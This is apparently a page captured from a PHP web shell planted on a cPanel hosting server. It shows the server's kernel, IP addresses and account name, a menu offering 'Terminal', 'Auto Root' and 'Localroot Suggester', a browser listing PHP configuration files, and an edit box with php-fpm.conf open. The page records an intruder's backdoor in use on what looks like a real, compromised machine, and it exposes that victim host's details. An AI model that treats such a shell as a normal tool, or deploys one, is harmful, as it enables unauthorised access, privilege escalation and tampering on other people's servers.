Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpanel /
ea-php56 /
root /
etc /
Delete
Unzip
Name
Size
Permission
Date
Action
php.d
[ DIR ]
drwxr-xr-x
2024-04-24 12:18
pear.conf.rpmnew
1.35
KB
-rw-r--r--
2021-02-14 18:32
pear.conf.rpmsave
1.69
KB
-rw-r--r--
2023-04-19 04:55
php-fpm.conf
561
B
-rw-------
2024-04-14 11:22
php-fpm.conf.rpmnew
1.79
KB
-rw-r--r--
2021-07-26 11:11
php-fpm.conf.rpmsave
561
B
-rw-------
2022-01-03 17:23
php-fpm.conf.save
561
B
-rw-------
2024-04-14 11:22
php.ini.2021_09_16-10_56_27
58.63
KB
-rw-r--r--
2021-09-16 10:56
php.ini.cagefs
39
B
-rw-r--r--
2024-04-24 12:20
php.ini.rpmsave
58.63
KB
-rw-r--r--
2022-07-21 20:10
Save
Rename
;;;;;;;;;;;;;;;;;;;;; ; FPM Configuration ; ;;;;;;;;;;;;;;;;;;;;; ; All relative paths in this configuration file are relative to PHP's install ; prefix. ; Include one or more files. If glob(3) exists, it is used to include a bunch of ; files from a glob(3) pattern. This directive can be used everywhere in the ; file. include=/opt/cpanel/ea-php56/root/etc/php-fpm.d/*.conf ;;;;;;;;;;;;;;;;;; ; Global Options ; ;;;;;;;;;;;;;;;;;; [global] ; Pid file ; Default Value: none pid = /opt/cpanel/ea-php56/root/usr/var/run/php-fpm/php-fpm.pid ; Error log file ; Default Value: /opt/cpanel/ea-php56/root/usr/var/log/php-fpm.log error_log = /opt/cpanel/ea-php56/root/usr/var/log/php-fpm/error.log ; Log level ; Possible Values: alert, error, warning, notice, debug ; Default Value: notice ;log_level = notice ; If this number of child processes exit with SIGSEGV or SIGBUS within the time ; interval set by emergency_restart_interval then FPM will restart. A value ; of '0' means 'Off'. ; Default Value: 0 ;emergency_restart_threshold = 0 ; Interval of time used by emergency_restart_interval to determine when ; a graceful restart will be initiated. This can be useful to work around ; accidental corruptions in an accelerator's shared memory. ; Available Units: s(econds), m(inutes), h(ours), or d(ays) ; Default Unit: seconds ; Default Value: 0 ;emergency_restart_interval = 0 ; Time limit for child processes to wait for a reaction on signals from master. ; Available units: s(econds), m(inutes), h(ours), or d(ays) ; Default Unit: seconds ; Default Value: 0 ;process_control_timeout = 0 ; Send FPM to background. Set to 'no' to keep FPM in foreground for debugging. ; Default Value: yes daemonize = no ;;;;;;;;;;;;;;;;;;;; ; Pool Definitions ; ;;;;;;;;;;;;;;;;;;;; ; See /opt/cpanel/ea-php56/root/etc/php-fpm.d/*.conf